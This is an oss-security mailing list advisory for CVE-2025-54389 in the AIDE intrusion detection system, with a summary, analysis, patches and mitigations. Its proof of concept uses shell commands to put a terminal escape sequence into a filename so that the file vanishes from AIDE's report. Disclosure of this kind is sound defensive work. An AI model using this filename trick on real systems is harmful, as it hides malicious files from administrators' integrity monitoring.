Products Openwall GNU/*/Linux   server OS Linux Kernel Runtime Guard John the Ripper   password cracker Free & Open Source for any platform in the cloud Pro for Linux Pro for macOS Wordlists   for password cracking passwdqc   policy enforcement Free & Open Source for Unix Pro for Windows (Active Directory) yescrypt   KDF & password hashing yespower   Proof-of-Work (PoW) crypt_blowfish   password hashing phpass   ditto in PHP tcb   better password shadowing Pluggable Authentication Modules scanlogd   port scan detector popa3d   tiny POP3 daemon blists   web interface to mailing lists msulogin   single user mode login php_mt_seed   mt_rand() cracker Services Publications Articles Presentations Resources Mailing lists Community wiki Source code repositories (GitHub) File archive & mirrors How to verify digital signatures OVE IDs What's new

Message-ID: <20250814140111.GA2@magnesium.vonhaugwitz.com>
Date: Thu, 14 Aug 2025 16:01:11 +0200
From: Hannes von Haugwitz <hannes@...haugwitz.com>
To: oss-security@...ts.openwall.com
Subject: CVE-2025-54389 - aide (<= 0.19.1): improper output neutralization
 (potential AIDE detection bypass)

Summary
=======

Rajesh Pangare discovered an improper output neutralization vulnerability in
AIDE, an advanced intrusion detection system. An attacker can craft a malicious
filename by including terminal escape sequences to hide the addition or removal
of the file from the report and/or tamper with the log output. A local user
might exploit this to bypass the AIDE detection of malicious files.
Additionally the output of extended attribute key names and symbolic links
targets are also not properly neutralized.

Project
=======

AIDE (https://aide.github.io)

Affected versions
=================

AIDE <= 0.19.1

CVE ID
======

CVE-2025-54389

Proof of concept
================

    $ mkdir test
    $ touch test/$(echo -e 'malicious-file\033[1A')
    $ touch test/regular-testfile
    $ aide --config <(printf -- "database_in=file:/dev/null\nroot_prefix = ./test\n/ R") --check
    Start timestamp: 2025-08-10 07:23:25 +0000 (AIDE 0.19.1)
    AIDE found differences between database and filesystem!!
    Root prefix: ./test

    Summary:
      Total number of entries:      3
      Added entries:                3
      Removed entries:              0
      Changed entries:              0

    ---------------------------------------------------
    Added entries:
    ---------------------------------------------------

    d++++++++++++++++++: /
    f++++++++++++++++++: /regular-testfile

    ---------------------------------------------------
    The attributes of the (uncompressed) database(s):
    ---------------------------------------------------

    /dev/null
     SHA256    : 47DEQpj8HBSa+/TImW+5JCeuQeRkm5NM
                 pJWZG3hSuFU=
     SHA512    : z4PhNX7vuL3xVChQ1m2AB9Yg5AULVxXc
                 g/SpIdNs6c5H0NE8XYXysP+DGNKHfuwv
                 Y7kxvUdBeoGlODJ6+SfaPg==
     STRIBOG256: P1OaIT6XyALMIp1HTGqjKoJaNgsqkzqU
                 n9klII2c4bs=
     STRIBOG512: jpRdogmqhp8EVZKFKbyuRnnphzq3B7VT
                 FfVs65i+8Kc2L3FVKDVu6DzaXyqsTGrS
                 ujpxXBvNgcuOn5C/TBwaig==
     SHA512/256: xnK40e9W7Sirh8NiLFEUBpvdOte4+XN0
                 mNDAHs7wlno=
     SHA3-256  : p//G+L8e12ZRwUdWoGHWYvWA/03kO0n6
                 gtgKS4D4Q0o=
     SHA3-512  : pp9zzKI6msXItWfcGFp1bpfJghZP4lhZ
                 4NHcwUdcgKYVshI68fX5TBHj6UAsOsVY
                 9QAZnZW20+MBdYWGKB3NJg==


    End timestamp: 2025-08-10 07:23:25 +0000 (run time: 0m 0s)

The output correctly shows the addition of `regular-testfile` but misses the
addition of the malicious file.

This works because the terminal escape sequence moves the cursor one line up
before the new line character of the regular output moves the cursor back to
the beginning of the line containing the malicious file; the next added entry
then overwrites the line.

Please note that the number of added entries is unchanged in the report. For
this POC a user might notice the difference between the number of added entries
and the list of added entries shown in the report, but with a much higher number
of added files the deviation is likely overlooked.

Analysis
========

The vulnerability is caused by missing output neutralization before printing
the filename, symbolic link target or extended attribute key name to the report
and log output.

This allows a user to craft a filename, symbolic link target or extended
attribute key name including control characters to tamper with or overwrite
previous output.

Mitigation
==========

Upgrade to AIDE v0.19.2 [v0.19.2]

Alternatively apply one of the provided patches:

aide-0.19_cve-2025-54389_control_chars.patch for 0.19.1
aide-0.18_cve-2025-54389_control_chars.patch for 0.18.8 (backported for Debian Bookworm)
aide-0.17_cve-2025-54389_control_chars.patch for 0.17.4 (backported for Debian Bullseye)

If you cannot upgrade, the issue can be mitigated by configuring AIDE to write
the report output to a regular file (e.g. `report_url=file:/var/log/aide.log`)
or redirecting stdout to a regular file. Additionally consider redirecting the
log output written to `stderr` to a regular file. Mind to open the generated
files with a program that escapes terminal sequences correctly.

[v0.19.2] https://github.com/aide/aide/releases/tag/v0.19.2

Credit
======

The issue was reported by Rajesh Pangare.

View attachment "aide-0.17_cve-2025-54389_control_chars.patch" of type "text/x-diff" (15255 bytes)

View attachment "aide-0.18_cve-2025-54389_control_chars.patch" of type "text/x-diff" (18647 bytes)

View attachment "aide-0.19_cve-2025-54389_control_chars.patch" of type "text/x-diff" (18339 bytes)

Download attachment "signature.asc" of type "application/pgp-signature" (660 bytes)

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.